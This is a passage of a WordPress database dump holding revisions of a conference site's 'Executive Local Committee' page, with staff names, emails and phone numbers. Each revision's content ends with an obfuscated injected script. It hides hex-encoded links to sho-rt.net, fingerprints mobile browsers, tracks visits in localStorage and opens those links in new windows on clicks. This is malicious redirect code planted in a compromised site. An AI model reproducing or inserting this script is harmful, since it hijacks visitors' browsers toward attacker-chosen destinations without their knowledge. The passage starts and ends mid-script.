Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:23:55','2023-06-27 10:23:55','',4849,'https://gsw2023.com/?p=4900',0,'revision','',0),
(4901,4,'2023-06-27 10:26:17','2023-06-27 10:26:17','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>IT Support</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Local Web director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span>\r\n<span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span>\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span>\r\n<span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span>\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:26:17','2023-06-27 10:26:17','',4849,'https://gsw2023.com/?p=4901',0,'revision','',0),
(4902,4,'2023-06-27 10:28:32','2023-06-27 10:28:32','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>IT Support</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Local Web director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 